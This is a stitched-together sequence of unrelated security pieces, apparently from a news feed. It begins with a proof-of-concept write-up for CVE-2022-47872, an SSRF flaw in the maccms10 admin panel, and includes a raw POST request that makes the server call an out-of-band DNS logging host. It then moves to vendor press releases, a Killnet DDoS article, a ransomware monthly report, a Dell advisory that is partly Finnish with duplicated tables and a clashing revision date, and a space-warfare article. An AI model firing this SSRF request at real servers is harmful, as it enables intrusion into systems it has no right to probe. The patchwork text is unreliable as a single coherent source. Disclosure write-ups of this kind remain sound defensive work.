maccms10 2021.1000.2000 is vulnerable to Server-side request forgery (SSRF).

#CVE-2022-47872

maccms10 admin+ ssrf attacks

Overview

Manufacturer's website information：https://maccms.pro

Source code download address ： https://github.com/maccmspro/maccms10.git

Affected version: V2021.1000.2000

2.Vulnerability details

maccmspro/maccms10#22

Enter the background, click Collect --> Custom interface --> Interface address,

In the name box into payload1:http://7ca8e96e.dns.1433.eu.org.

It can cause ssrf attacks.

Vulnerability name：ssrf attacks

Vulnerability level：Medium risk

Vulnerability location： click Collect --> Custom interface --> Interface address

3.Recurring vulnerabilities and

POST http://192.168.52.163/admin.php/admin/collect/info.html HTTP/1.1

Host: 192.168.52.163

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:106.0) Gecko/20100101 Firefox/106.0

Accept: _/_

AcceptLanguage: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding:gzip,deflate

Content-Type: applicat ion/ x-www-form-urlencoded; charset=UTF-8

X-Requested-With: XMLHttpRequest

Content-Length: 226

Origin: http://192.168.52.163

Connection: close

Referer: http://192.168.52.163/admin.php/admin/collect/info.html

Cookie: PHPSESSID=gn328q2i2ruajsh96qoll65ia7

collect\_id=&_token_\=8d639020c85bde89f9276381d2460046&collect\_name=1111&collect\_url=http%3A%2F%2F7ca8e96e.dns.1433.eu.org.&collect\_param=%26q%3D1&collect\_type=1&collect\_mid=1&collect\_opt=Ø&collect\_filter=0&collect\_filter\_from=

CVE-2022-47872: CVE-2022-47872/README.md at main · Cedric1314/CVE-2022-47872

Move will strengthen position as a leader in the identity governance and analytics market.

**NOVATO, Calif. — (****BUSINESS WIRE****) —** Radiant Logic, the Identity Data Fabric company, announced today that it has entered into a definitive agreement to acquire Brainwave GRC, a leader in Identity Governance and Analytics (IGA) headquartered in France. Together, Radiant Logic and Brainwave GRC address a broad set of identity use cases, and the acquisition accelerates the companies’ shared vision of an Identity Data Fabric that uses the science of data to ensure the right information is in place to make the right policy decisions.

“Demand is increasing for cyber security, governance and compliance solutions that help companies address the continually evolving security threats, especially as regulatory environments and fines become more prevalent,” said Joe Sander, CEO of Radiant Logic. “By joining forces with Brainwave we will be able to unlock tremendous value for current and future customers by unleashing the power of identity data to help truly transform an organization’s IT landscape. Our combined platform will allow organizations to add unprecedented agility and flexibility in their infrastructure and business processes, while improving business continuity and security posture and reducing the total cost of ongoing regulatory compliance and IAM or IGA programs.”

Cyril Gollain, CEO and co-founder of Brainwave GRC, stated: “Merging with Radiant Logic is the natural next step for Brainwave GRC, providing transformative value for both our customers and employees alike. Together, this combined platform offers exceptional new insight into the role of identity data in the enterprise, and accelerates innovations in the area of analytics and IGA. We are delighted to benefit from Radiant Logic’s proven success, and when combined with our experience and reach in EMEA, it will allow us both to further expand and flourish.”

The acquisition will strengthen both Radiant Logic and Brainwave GRC’s respective market positions as identity, analytics and intelligence experts by offering a new lightweight data-centric governance capability and a market-defining identity data intelligence platform. By combining their unique capabilities into a single platform, customers can speed time-to-value by eliminating burdensome IGA deployments and focusing on what really matters to audit and compliance teams—getting the right data, which can be trusted, in a timely manner.

The identity analytics and intelligence insights resulting from Radiant Logic + Brainwave’s data-driven approach will give unprecedented insight into near real-time user behavior within an enterprise environment, transforming how organizations detect cyberattacks, fraudulent activity, lateral movement from insider threats, and more. Radiant + Brainwave is a winning combination that will provide an unmatched Zero Trust and Identity-First Security foundation for enhanced data security, reduced audit and compliance costs, and improved understanding and visibility of malicious activity.

Established in 2010 in France, Brainwave GRC has a strong reputation in helping companies across EMEA ensure compliance and protect their assets from fraud and cyber threats. Brainwave GRC provides essential Access Governance reports that include access risks, accounts, attestations, and out-of-the-box reports for major compliance frameworks—a common requirement in highly regulated markets. Their light IGA capabilities complements Radiant Logic’s identity data management expertise, and is in-line with its strategic direction to expand its offerings in the IGA market segment.

“We have strived to provide the absolute best value to our customers and truly believe this future product integration will not only streamline IAM and IGA infrastructure, but bring the value of data science and advanced analytics to the identity space,” said John Pritchard, Chief Product Officer, Radiant Logic. “The Brainwave platform will be a core component in driving RadiantOne’s new identity intelligence capabilities, realizing the vision of an Identity Data Fabric.”

“The winning combination of Radiant Logic and Brainwave will provide unmatched capabilities for an identity-first approach to security,” says Sebastien Faivre, CTO and Brainwave co-founder. “We believe that by combining our background in identity analytics with Radiant’s identity data management expertise, we can deliver innovative new solutions utilizing artificial intelligence and machine learning capabilities which can only be enhanced by ingesting the clean data from the RadiantOne platform.”

Brainwave will maintain independent operations for the near-time, while both platforms continue to be supported, invested in, and integrated over time. The transaction is subject to customary closing conditions. Terms of the acquisition were not disclosed.

**About Radiant Logic**

Radiant Logic, the enterprise Identity Data Fabric company, provides the cornerstone of complex identity architectures in today’s digital world. With Radiant, it’s fast and easy to put identity data to work, connecting many disparate data sources across legacy and cloud infrastructures in real-time, without disruption. Our solution creates a solid identity foundation that speeds the success of initiatives, including single sign-on, M&A integrations, identity governance and administration, cloud directory deployments, hybrid and multi-cloud environments, customer identity and access management, and more. From the Fortune 1000 to government agencies, organizations across the globe rely on Radiant to deliver meaningfully faster time-to-value and unprecedented IT agility, while building a secure, future-proof identity infrastructure that meets real-world business demands. Learn more at www.radiantlogic.com

**About Brainwave GRC**

Brainwave GRC is a pioneer in the identity analytics market. Named Cool Vendor by Gartner, Brainwave GRC solutions help solidify and reinforce IAM risk and compliance postures. Brainwave GRC derives intelligence through multicriteria analyses for data visualization, anomaly detection, smart access reviews and compliance controls specifically for identity and access events. It enables organizations to combat cyber risks, detect internal threats, remediate noncompliance access risks and perform fraud alert notifications with innovative solutions. Brainwave GRC strengthens your cybersecurity with preventive and predictive analytics.

Radiant Logic Signs Definitive Agreement to Acquire Brainwave GRC

Killnet is building its profile, inspiring jewelry sales and rap anthems. But the impact of its DDoS attacks, like the ones that targeted 14 major US hospitals this week, remain largely questionable.

Pro-Russian hacktivist group Killnet this week launched distributed denial-of-service (DDoS) attacks on networks belonging to 14 major US hospitals in its continuing retaliation campaign against entities in countries the threat actor perceives as hostile to Russian interests in Ukraine.

The attacks — like most Killnet attacks since Russia's invasion last February — appear to have done little to seriously disrupt network operations at any of the targeted organizations, which included Stanford Health, Michigan Medicine, Duke Health, and Cedars-Sinai.

**Designed to Garner More Support**

That said, they are likely going to garner Killnet more support from other like-minded hacktivists in Russia and elsewhere, and possibly even fuel investments into its operations from others, making them more dangerous in the process, security experts said this week.

"Killnet has been actively attacking anyone who supports Ukraine or goes against Russia for almost 12 months now," says Pascal Geenens, director of threat intelligence at Radware. "They have been dedicated to their cause and have had the time to build experience and increase their circle of influence across affiliate pro-Russian hacktivist groups."

Killnet surfaced last year, soon after Russia invaded Ukraine in February. Since then, the group has carried out a series of often high-profile DDoS attacks on organizations in critical infrastructure sectors in the US and multiple other countries. Their victims have included airports, banks, defense contractors, hospitals, Internet service providers, and the White House.

Killnet's latest DDoS campaign this week against hospitals in the US and medical institutions in multiple other countries, including Germany, Poland, and the UK, were likely motivated by the recent US-led decision by NATO countries to send battle tanks to Ukraine. However, the impact of these attacks remains questionable.

**Killnet's Questionable DDoS Impact**

Mary Masson, director of public relations at Michigan Medicine, for instance, says Killnet's DDoS attacks hit multiple of its websites on Jan. 30, including uofmhealth.org and mottchildren.org. Masson describes the attacks as causing "intermittent problems" for some of Michigan Medicine's public-facing websites hosted by a third-party service provider. 

"None of the sites impacted contain patient information, and all patient information is safe," she notes. "Patients were always still able to access the patient portal via myuofmhealth.org." The websites were all back to almost normal operations a day later, on Jan. 31.

Sally Stewart, associate director of media relations at Cedars-Sinai, describes Killnet's DDoS attack as having a similarly low impact on the hospital's operations: "The Cedars-Sinai website experienced a brief service interruption early Monday morning that has resolved. The website remains fully functional," Stewart said in an emailed statement to Dark Reading.

Stanford Healthcare and Duke Health did not immediately respond to Dark Reading's request for comment.

"They are not as disruptive as they claim to be," Geenens says, adding that Killnet’s main objective is attracting attention and getting their pro-Russian message heard. "They go after targets that are visible to the larger public, such as public websites of institutions, governments, and organizations." Often the resources the group has targeted are not business-critical. 

**A Mistake to Underestimate**

That does not mean the group can be ignored, however. In an advisory following the recent DDoS attacks, the American Hospital Association described Killnet as an active threat to the healthcare industry. 

"While KillNet’s DDoS attacks usually do not cause major damage, they can cause service outages lasting several hours or even days," the AHA warned. Killnet's links to Russia's Foreign Intelligence Service remain unconfirmed, AHA noted, "\[but\] the group should be considered a threat to government and critical infrastructure organizations, including healthcare."

Importantly, Killnet's pro-Russian DDoS crusade has also begun attracting many more followers and fans. Daniel Smith, head of cyber-threat intelligence at Radware, says the number of subscribers for @Killnet\_reserve on Telegram grew from about 34,000 subscribers to 85,000 subscribers in June 2022. "Just for comparison, IT Army of Ukraine has over 200,000 subscribers, but has been losing subscribers since March 2022," he says.

The group has focused quite a bit on publicity via its Telegram channel, which it also uses to encourage followers to conduct DDoS attacks of their own.

**Jewelry and Rap Anthems: Growing Killnet Support**

Radware's Geenens points to affiliate Russian groups such as NoName and the Passion Group offering their DDoS botnets to Killnet for carrying out attacks as one indication of the growing support it has begun attracting within Russia. 

Other signs of the support that Killnet has mobilized in recent months include a song in the gang's honor, titled “KillnetFlow (Anonymous diss)” by a Russian rapper, and the sale of Killnet-related jewelry by a Moscow-based jewelry maker called HooliganZ. Killnet has also received some $44,000 worth of financial support from a Dark Web marketplace called Solaris, according to Radware. 

"Killnet’s influence, reach, and skills are growing, and they are not showing signs of slowing down or retiring soon," Geenens warns.

It's unclear how, if at all, Killnet will leverage its growing support, or whether it will pivot to other, more dangerous forms of attack. Aleksandr Yamploskiy, co-founder and CEO at SecurityScorecard, notes how Killnet began as a financially motivated operation offering a botnet for hire. But it has since become more of a hacktivist collective, conducting a series of relatively low-sophistication DDoS attacks against targets it perceives to oppose the Russian invasion of Ukraine. "Killnet has historically made use of open proxy IP addresses and publicly available scripts in its attacks," he says.

What makes the group now potentially more dangerous are its growing reach and skills, Radware's Smith adds. A few months ago, Radware's assessment of the risk posed by a pro-Russian hacktivist group such as Killnet would have been low, he explains. "But after 12 months of building their experience," he says, "advancing their tools and growing their social network, I’m more likely to increase that risk to moderate."

While there's no reason for panic, it is better to err on the side of caution and be prepared. "Everyone in the security community knows it does not take extremely skilled or sophisticated actors to disrupt or cause impact to an organization or infrastructure," Smith adds.

Inside Killnet: Pro-Russia Hacktivist Group's Support and Influence Grows

Categories: Threat Intelligence
Our Threat Intelligence team looks at known ransomware attacks by gang, country, and industry sector in December 2022, and looks at why LockBit had to make a public apology



(Read more...)




The post Ransomware in December 2022 appeared first on Malwarebytes Labs.

_Malwarebytes Threat Intelligence builds a monthly picture of ransomware activity by monitoring the information published by ransomware gangs on their dark web leak sites. This information represents victims who were successfully attacked but opted not to pay a ransom._

Lockbit has rebounded from its unusual fall from grace in November, snatching the title of the month's worst ransomware, back from Royal. Royal has meanwhile still shown itself as a force to be reckoned with, ranking third in number of attacks for December. 

Known ransomware attacks by gang in December 2022

Attacks by Royal may be down 35 percent from their high of 49 in November, but at the same time, there’s good reason to suspect that their attacks are becoming more targeted. 

On December 07, 2022, the Health Sector Cybersecurity Coordination Center (HC3)—an arm of the US Department of Health and Human Services (HHS)—released a threat brief about Royal after observing the group disproportionately targeting the healthcare industry. Their crowning attack for December came late in the month when they breached telecommunications company Intrado.

Known ransomware attacks by industry sector in December 2022

Known ransomware attacks by country in December 2022

In terms of progress, the two newcomers that we introduced last month, Play and Project Relic, have vastly different stories to tell. 

Project Relic has fallen off the map while Play has turned up the jets—we recorded a whopping 136 percent increase in attacks from the gang compared to November. Since our last update Play has been seen leveraging a never-before-seen exploit chain, which might be responsible for their sharp uptick in attacks. The new Microsoft Exchange attack, dubbed 'OWASSRF', chains exploits for CVE-2022-41082 and CVE-2022-41080 to gain initial access to corporate networks. This was the technique behind a ransomware attack on cloud computing service provider Rackspace in early December, which Play later claimed responsibility for. 

Play’s surge in activity, however, was hardly an anomaly for December. Month-on-month we saw hefty percentage-point increases in attacks across the board.

ALPHV (aka BlackCat), for example, is a ransomware gang that has consistently topped the charts in our ransomware reviews; the number of their attacks in December (33), however, is not only a 70 percent increase from November but also the highest it's been all 2022. We also saw 25 percent and 116 percent increases from BianLian and BlackBasta, respectively. These upticks are perhaps to be expected, given that attackers famously love the holiday seasons due to the reduction in security staff on deck. Only time will tell if ransomware gangs will sustain their heightened levels of activity into the New Year—or if the increase is indeed simply a gift-wrapped aberration.

**Lockbit… apologizes?**

Lockbit in December regained the throne as the biggest ransomware gang by attack volume, reversing a three-month downward trend in number of victims.

The prolific ransomware group claimed on December 12 to have stolen up to 75GB of confidential data from California’s Department of Finance, or over 246,000 files in more than 114,000 folders. Not even SickKids (a hospital for sick children) was spared from LockBit’s avarice in December. A ransomware attack using LockBit impacted the hospital's internal and corporate systems, hospital phone lines, and website.

While we’re not surprised to see a gang stoop to such lows, we don’t find many issuing apologies after the fact. Two days later LockBit apologized for the attack, which it blamed on a rogue affiliate, and released a decryptor for free. 

LockBit's operation's policy states "It is forbidden to encrypt institutions where damage to the files could lead to death, such as cardiology centers, neurosurgical departments, maternity hospitals and the like, that is, those institutions where surgical procedures on high-tech equipment using computers may be performed."

Of course the apology doesn't turn LockBit in to some kind of Robin Hood. Its business model is to inflict so much harm that people are willing to pay a fortune to make it stop.

**New ransomware gangs****Unsafe**

In December, we saw a group emerge that makes its cash by riding on the coattails of real ransomware gangs. 

The new player, Unsafe, seems to recycle leaks from other ransomware groups. Unsafe provides security blogs for cybercriminals to post victims and leaked data as well as consultation services for a fee. It currently lists eight victims. 

**Endurance**

We call them ransomware _gangs_ for a reason: These are groups of cybercriminals working together in a hierarchical organization. Rarely do we ever see lone wolf attacks, and if we do it’s even more unusual for them to make as big of a splash in so short of a time as Endurance has.

This cybercriminal, known on dark web forums as IntelBroker, tends to make individual posts about data on sale.

In less than 30 days since its inception, Endurance appears to have successfully infiltrated some big corporations and breached several US government entities. After posting some high-value victims, Endurance has removed them from its dark web site, which is "undergoing development".

Ransomware in December 2022

Gem Security provides the world's first holistic approach for Cloud TDIR, bridging the gap between cloud complexity and security operations.

**TEL AVIV, Israel****,** **Feb. 1, 2023** **/PRNewswire/ —** Gem Security today emerged from stealth, launching its Cloud TDIR (Threat Detection, Investigation and Response) platform and announcing $11 million in Seed funding led by Team8.

The adoption of cloud infrastructure is increasing and diversifying the attack surface for organizations. 90% of all organizations use more than one cloud provider\[1\]. As Gartner notes\[2\], the expansion in attack surface is rarely paralleled with coverage by detection and response initiatives, leaving organizations unaware of a variety of threat vectors. 79% of companies have experienced at least one cloud data breach in the last 18 months, with 43% of companies reporting ten or more\[3\].

While there is no lack of solutions for detection and response, legacy approaches fall short of providing a solution for the cloud era. The proliferation of cloud services across infrastructure, platforms, and software has fragmented the security landscape. Collecting and correlating the explosion of associated telemetry is both challenging and inadequate.

Gem Security goes beyond this, helping organizations act on Gartner's recommendation to implement a continuous, risk-based program to manage their threat exposure. Gem Security offers a platform that leverages existing infrastructure and solutions while offering unique automated detection, investigation and response capabilities purposely-built for cloud environments.

Gem Security supports all major infrastructure platforms - AWS, Azure, Google Cloud and Kubernetes. Furthermore, Gem's platform integrates with leading platforms like identity providers, source code repositories and secrets managers, leveraging the additional data for context analysis. Gem Security is already working with companies ranging from mid-market to Fortune 500.

"Most cloud security solutions focus on building a wall that is as tall as possible to make sure the bad guys stay out. That sounds good in theory. In practice, however, no wall is ever going to be tall enough. We offer a more realistic approach, starting from the fact that cloud environments are and will remain imperfect. If it's perfect, it's only for five minutes, and then it's going to be imperfect again.

Minimizing the potential for intrusion is only half the story. When someone jumps over the wall, we don't just raise an alarm. Gem's platform will empower your team to find and stop the intruder, automating your incident response and ensuring there is no escalation. Where others end, we begin", said Gem Security Co-Founder & CEO Arie Zilberstein.

Zilberstein co-founded Gem Security with CTO Ron Konigsberg and VP Product Ofir Brukner. Gem's founders are all security industry veterans, having spent years in the trenches responding to large-scale breaches in the cloud. They previously held key roles in elite Israeli Intelligence Corps Unit 8200 as well as Sygnia, an Incident Response and cybersecurity company working with global top tier organizations.

Gem Security's holistic approach for Cloud TDIR bridges the gap between security operations and cloud complexity. Lessons learned from years of experience working in some of the most demanding cloud environments in the world have been leveraged in building Gem's comprehensive platform, enabling organizations to:

*   **Prepare**. Optimizing coverage via a continuous Cloud Incident Readiness dashboard
*   **Detect**. Combining real-time cloud-native threat detection based on TTPs (Tactics, Techniques & Procedures) and behavioral analytics
*   **Investigate**. Enriching context across the entirety of cloud infrastructure for instant root cause analysis
*   **Respond**. Isolating risks swiftly using cloud-native entity quarantine capabilities

"Gem is redefining the cloud security operations game", said ADM Michael S. Rogers, Former Director of the NSA. "Security organizations today struggle to find cloud experts, and the complexity of cloud environments is leaving teams blind to emerging attacks. Gem empowers security operations with a simple, automated, and efficient approach that allows organizations to respond faster and minimize the impact of attacks in the cloud".

"Cloud migration brings new opportunities to enterprises, but also entails quite a few challenges and risk, including the need to adapt existing solutions to the new cloud infrastructure" said Nadav Zafrir, Managing Partner at Team8 Group and former head of Israel's elite technology Unit 8200. "We are thrilled to team up with Gem's talented founders, who have gained years of experience in incident response at Sygnia, our portfolio company, and to support their mission to build the next generation of cloud security. Gem's unique platform offers a first-of-its-kind solution to deal with the inevitable attacks on cloud environments, and is based on an intuitive, automatic, and efficient approach that allows organizations to identify cloud security events in real-time; investigate them based on behavior analysis and threat intelligence; respond quickly, and enable isolation of the threat. All this - to minimize the impact of cloud attacks."

**About Gem Security**

Gem Security is a rapidly growing Cloud TDIR platform provider that bridges the gap between security operations and cloud complexity. Headquartered in New York and Israel, Gem Security is funded by global investors, led by Team8. For more information, visit gem.security.

**About Team8**

Team8 is a venture group that builds and backs the most innovative technology companies in the fields of fintech, cyber, data, and digital health. We leverage deep domain expertise, cutting-edge technology, and first-hand company-building experience to partner with entrepreneurs in founding globally-successful companies, while also investing in early-stage companies that are active in the group's fields of interest. For more information, visit www.team8.vc.

Gem Security Emerges From Stealth With $11M, Unveils Cloud TDIR Platform for Faster Response to Cloud Threats

Dell EMC prior to version DDOS 7.9 contain(s) an OS command injection Vulnerability. An authenticated non admin attacker could potentially exploit this vulnerability, leading to the execution of arbitrary OS commands on the application's underlying OS, with the privileges of the vulnerable application.

**Vaikutus**

Critical

**Tiedot**

**Proprietary Code CVEs**

**Description**

**CVSS Base Score**

**CVSS Vector String**

CVE-2023-23692

Dell before DDOS 7.9 has a vulnerability that may potentially allow escalation of privileges by authenticated user of lower privilege. This can lead to unauthorized privileged access into the system.

8.8

CVSS v3.1: AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

 

**Third-party Component**

**CVEs**

**More information**

iDRAC9

CVE-2022-24422

See Dell KB article 199267: DSA-2022-068: Dell iDRAC9 Security Update for an Improper Authentication Vulnerability

Intel BIOS

CVE-2021-0060

See Dell article 196007: DSA-2022-036: PowerEdge Server Security Update for Intel February 2022 Security Advisory Release

CVE-2021-0147

CVE-2021-0127

CVE-2021-0103

CVE-2021-0114

CVE-2021-0115

CVE-2021-0116

CVE-2021-0117

CVE-2021-0118

CVE-2021-0099

CVE-2021-0111

CVE-2021-0107

CVE-2021-0125

CVE-2021-0124

CVE-2021-0119

CVE-2021-0092

CVE-2021-0091

CVE-2021-0093

CVE-2019-14584

See Dell article 198065: DSA-2022-088: Dell PowerEdge Server BIOS Security Update for Multiple Tianocore EDK2 Vulnerabilities

CVE-2021-28210

CVE-2021-28211

OpenSSL

CVE-2022-0778

https://nvd.nist.gov/vuln/detail/CVE-2022-0778

OpenSSH

CVE-2021-41617

https://nvd.nist.gov/vuln/detail/CVE-2021-41617  
https://nvd.nist.gov/vuln/detail/CVE-2020-14145  
https://nvd.nist.gov/vuln/detail/CVE-2016-20012

CVE-2020-14145

CVE-2016-20012

**Proprietary Code CVEs**

**Description**

**CVSS Base Score**

**CVSS Vector String**

CVE-2023-23692

Dell before DDOS 7.9 has a vulnerability that may potentially allow escalation of privileges by authenticated user of lower privilege. This can lead to unauthorized privileged access into the system.

8.8

CVSS v3.1: AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

 

**Third-party Component**

**CVEs**

**More information**

iDRAC9

CVE-2022-24422

See Dell KB article 199267: DSA-2022-068: Dell iDRAC9 Security Update for an Improper Authentication Vulnerability

Intel BIOS

CVE-2021-0060

See Dell article 196007: DSA-2022-036: PowerEdge Server Security Update for Intel February 2022 Security Advisory Release

CVE-2021-0147

CVE-2021-0127

CVE-2021-0103

CVE-2021-0114

CVE-2021-0115

CVE-2021-0116

CVE-2021-0117

CVE-2021-0118

CVE-2021-0099

CVE-2021-0111

CVE-2021-0107

CVE-2021-0125

CVE-2021-0124

CVE-2021-0119

CVE-2021-0092

CVE-2021-0091

CVE-2021-0093

CVE-2019-14584

See Dell article 198065: DSA-2022-088: Dell PowerEdge Server BIOS Security Update for Multiple Tianocore EDK2 Vulnerabilities

CVE-2021-28210

CVE-2021-28211

OpenSSL

CVE-2022-0778

https://nvd.nist.gov/vuln/detail/CVE-2022-0778

OpenSSH

CVE-2021-41617

https://nvd.nist.gov/vuln/detail/CVE-2021-41617  
https://nvd.nist.gov/vuln/detail/CVE-2020-14145  
https://nvd.nist.gov/vuln/detail/CVE-2016-20012

CVE-2020-14145

CVE-2016-20012

Dell Technologies suosittelee, että kaikki asiakkaat ottavat huomioon sekä CVSS-peruspistemäärän että kaikki asiaankuuluvat väliaikaiset ja ympäristöön liittyvät pisteet, jotka voivat vaikuttaa tietyn tietoturvahaavoittuvuuden mahdolliseen vakavuuteen.

**Tuotteet, joihin asia vaikuttaa ja tilanteen korjaaminen**

CVEs Addressed

Product

Affected Versions

Updated Versions

Link to Update

CVE-2022-24422

PowerProtect DD Appliance model: DD3300, DD6400, and DD6900, DD9400, and DD9900

7.0 to 7.8

7.9.0.0 and later  
Or  
7.7.2 and later to stay on LTS 7.7

For more details about DDOS versions available for download, see the links to Dell articles below (requires log in to Dell Support to view articles):

*   81247: Data Domain: DD OS Software Versions
*   14125: Data Domain Operating System Software Portal Availability Policy

CVE-2021-0060

CVE-2021-0147

CVE-2021-0127

CVE-2021-0103

CVE-2021-0114

CVE-2021-0115

CVE-2021-0116

CVE-2021-0117

CVE-2021-0118

CVE-2021-0099

CVE-2021-0111

CVE-2021-0107

CVE-2021-0125

CVE-2021-0124

CVE-2021-0119

CVE-2021-0092

CVE-2021-0091

CVE-2021-0093

CVE-2019-14584

CVE-2021-28210

CVE-2021-28211

CVE-2022-0778

PowerProtect DD  
DDOS and DDMC

7.0 to 7.8

7.9.0.0 and later  
Or  
7.7.3 and later to stay on LTS

CVE-2021-41617

CVE-2020-14145

LTS 7.7.1 to 7.7.2

7.7.3 and later

CVE-2016-20012

6.2.1.80 and earlier

6.2.1.90 and later

CVE-2023-23692

CVEs Addressed

Product

Affected Versions

Updated Versions

Link to Update

CVE-2022-24422

PowerProtect DD Appliance model: DD3300, DD6400, and DD6900, DD9400, and DD9900

7.0 to 7.8

7.9.0.0 and later  
Or  
7.7.2 and later to stay on LTS 7.7

For more details about DDOS versions available for download, see the links to Dell articles below (requires log in to Dell Support to view articles):

*   81247: Data Domain: DD OS Software Versions
*   14125: Data Domain Operating System Software Portal Availability Policy

CVE-2021-0060

CVE-2021-0147

CVE-2021-0127

CVE-2021-0103

CVE-2021-0114

CVE-2021-0115

CVE-2021-0116

CVE-2021-0117

CVE-2021-0118

CVE-2021-0099

CVE-2021-0111

CVE-2021-0107

CVE-2021-0125

CVE-2021-0124

CVE-2021-0119

CVE-2021-0092

CVE-2021-0091

CVE-2021-0093

CVE-2019-14584

CVE-2021-28210

CVE-2021-28211

CVE-2022-0778

PowerProtect DD  
DDOS and DDMC

7.0 to 7.8

7.9.0.0 and later  
Or  
7.7.3 and later to stay on LTS

CVE-2021-41617

CVE-2020-14145

LTS 7.7.1 to 7.7.2

7.7.3 and later

CVE-2016-20012

6.2.1.80 and earlier

6.2.1.90 and later

CVE-2023-23692

**Versiohistoria**

**Revision**

**Date**

**Description**

1.0

2022-07-07

Initial Release

1.1

2022-07-12

Edited versions in Affected Products and Remediation Table Affected Version Column

1.2

2022-08-31

Added "7.7.3 and above" to Affected Products and Remediation Table

1.3

2022-01-12

Added CVE-2023-23692 to Proprietary Code Table. 

**Asiaan liittyvät tiedot**

Dell Security Advisories and Notices  
Dell Vulnerability Response Policy  
CVSS Scoring Guide

Data Domain, Data Domain, Data Domain Boost, Data Domain Boost – File System, Data Domain Boost - Open Storage, Data Domain Deduplication Storage Systems, Data Domain Encryption, Data Domain Extended Retention, Data Domain GDA , Data Domain NDMP Tape Server, Data Domain Replicator, Data Domain Retention Lock, Data Domain Storage Migration, Data Domain Virtual Tape Library, Data Domain Virtual Tape Library for IBM I/OS, Data Domain Virtual Edition, PowerProtect Data Domain Management Center, Product Security Information, Storage Direct for Data Domain ...

27 tammik. 2023

CVE-2023-23692: DSA-2022-187: Dell Technologies PowerProtect Data Domain Security Update for Multiple Third-Party Component Vulnerabilities

True Anomaly, a startup backed by US senator JD Vance's VC firm, plans to launch prototype pursuit satellites on a SpaceX flight later this year.

Former US Air Force major Even “Jolly” Rogers is worried about a space war. “Conflict exists on a continuum that begins with competition and ultimately leads into full-scale conflict like what you’re seeing in Ukraine,” he says. The US, he adds, is already “in active competition with Russia and China for freedom of action and dominance of the space domain. And it’s evolving very quickly.”

So on January 26 last year, the former US Air Force major incorporated True Anomaly, Inc to “solve the most challenging orbital warfare problems for the US Space Force,” he later tweeted.

According to a recent filing with the US Federal Communication Commission (FCC), True Anomaly is now gearing up for its first orbital mission. In October, True Anomaly hopes to launch two Jackal “orbital pursuit” spacecraft aboard a SpaceX rocket to low earth orbit. The Jackals will not house guns, warheads, or laser blasters, but they will be capable of rendezvous proximity operations (RPO)—the ability to maneuver close to other satellites and train a battery of sensors upon them. This could reveal their rivals’ surveillance and weapons systems, or help intercept communications. 

In their first mission, dubbed Demo-1, the Jackals will merely spy on each other, using thrusters, radar, and multi-spectral cameras to approach within a few hundred meters. If that goes well, Rogers envisages deploying thousands of autonomous spacecraft in service of the US military, controlled by a team of human operators and AI “to pursue adversaries wherever they fly, and to provide the tools of accountability.”

Those tools start with understanding what technologies America’s adversaries are deploying in space. “But an active defense is going to be required,” says Rogers, now True Anomaly’s CEO. “If you take the job of defense and protection of the domain seriously, you have to have the ability to do the joint functions of maneuver and fires.” In military speak, “fires” means kinetic weapons like guns and shells, as well as jamming, electronic warfare, and cyberattacks.  

Nothing on True Anomaly’s website suggests that it is developing its own offensive weapons. However, in a series of posts last summer, Rogers tweeted: “Tactically disabling enemy spacecraft can be the difference between the loss of an entire Carrier Strike Group or its survival … And there are many ways to destroy spacecraft that don’t ruin the environment. After all, they are just floating computers.”

RPO itself is nothing new. In a report last September, the Secure World Foundation, a private foundation promoting cooperative solutions in space, detailed dozens of military RPO operations in geostationary and low earth orbits since the Cold War. Most of these involve American, Russian, or Chinese spacecraft sidling up to each other’s satellites, presumably to see what they look like or to eavesdrop on their communications.

There are also emerging peaceful uses of RPO, such as space tugs that can repair or relocate failed satellites, or remove dangerous space junk. The Secure World Foundation helps run an organization called Confers that is setting voluntary technical standards for commercial RPO. True Anomaly is one of around 60 Confers members. “If we ever want to do things like cleaning up space debris, we have to develop these technologies,” says Brian Weeden, the foundation’s director of planning. However, True Anomaly is the first RPO startup explicitly focusing on the military market, he says.  

Rogers’s last job for the government was leading teams within US Space Command that planned how and when to deploy defensive and offensive military space systems. He and his cofounders, Dan Brunski, Tom Nichols, and Kyle Zakrzewski, also former Air Force and Space Force officers, “knew the problem better than anybody else, dealt with the limitations of technology on a day-to-day basis, and were frustrated with those limitations,” Rogers says. Rather than wait for a large industrial defense contractor to get around to it, they decided to solve the problem themselves. The deployment of space weapons, he says, “is much closer than most people would think.”

According to US Security Exchange Commission filings, True Anomaly has already raised over $23 million from investors. This includes a December investment from Narya, a venture capital firm cofounded by US senator JD Vance, a MAGA-leaning Ohio Republican. (Rogers says that True Anomaly itself has no political affiliation.) 

The company recently signed a lease on a 35,000-square-foot factory in the suburbs of Denver, Colorado. As well as manufacturing the Jackal satellites, True Anomaly engineers are designing a cloud-based control system to integrate autonomous agents and human operators, using commercial game engines like Unity to build interactive real-time applications and developing high-fidelity physics software to help the Jackals maneuver in space. True Anomaly has already applied for a trademark covering, among other things, hardware and software for “orbital space-to-space imagery, rendezvous proximity, and target acquisition systems.” 

“What is different about True Anomaly is the way it seems to be presenting its satellite as more of a pursuit system, than an imaging or an intelligence gathering system,” says Kaitlyn Johnson, deputy director of the Aerospace Security Project at the Center for Strategic & International Studies. “This does concern me because it could cause unintentional escalation. Especially with the founder’s Air Force background, it might be read by our adversaries as a military-directed company that was starting to pursue this capability.”

The company’s first challenge could be keeping its own floating computers intact. “Cooperative RPO is already hard,” says Johnson. “You can see that from the demonstrations by Astroscale and Northrop with their servicing satellites, which were years in the planning.” A cooperative RPO mission by NASA in 2005 called DART failed when the spacecraft malfunctioned, crashed into its target satellite, and was destroyed. 

Pursuit missions of adversarial satellites are likely to be much riskier still, says Johnson: “You don’t have the same data coming from the other satellite. You maybe don’t have the diagrams and diagnostics of what the satellite looks like so that you know what you’re about to encounter.”

Any collision in orbit can generate many thousands of pieces of space junk, each of which could damage other satellites, creating yet more debris. Researchers worry about increasing orbital debris ultimately triggering a catastrophic cascade known as the Kessler Syndrome. Rogers says that collision avoidance is a possibility “that we track very closely and aggressively. We’re committed to acting responsibly and sustainably in the space domain.”

Rogers himself is no stranger to risk. Before starting True Anomaly, he founded and led a crypto hedge fund called Phobos Capital. And prior to that, he incorporated a company called 3720 to 1, Inc—a reference to the odds of Han Solo successfully navigating an asteroid field in _The Empire Strikes Back_, according to C-3PO. 

